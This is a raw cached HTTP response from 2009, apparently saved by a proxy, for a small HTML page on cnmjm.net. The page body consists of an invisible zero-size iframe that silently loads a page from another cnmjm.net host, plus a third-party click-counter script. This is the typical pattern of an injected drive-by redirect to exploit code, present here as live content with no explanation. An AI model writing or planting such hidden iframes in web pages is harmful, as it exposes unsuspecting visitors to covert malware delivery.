HTTP/1.1 200 OK
Content-Length: 187
ETag: "a46e53f831e6c81:475"
Date: Tue, 03 Mar 2009 02:21:43 GMT
Last-Modified: Tue, 15 Jul 2008 04:19:27 GMT
Content-Type: text/html
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Polipo-Location: http://qbscs.cnmjm.net/zz.html
X-Polipo-Date: Tue, 03 Mar 2009 02:33:13 GMT
X-Polipo-Access: Tue, 03 Mar 2009 02:33:13 GMT

<iframe src='http://jj.cnmjm.net/a11.htm' style="width: 0px; height: 0px;"></iframe>
<script language="javascript" src="http://count38.51yes.com/click.aspx?id=386950387&logo=1"></script>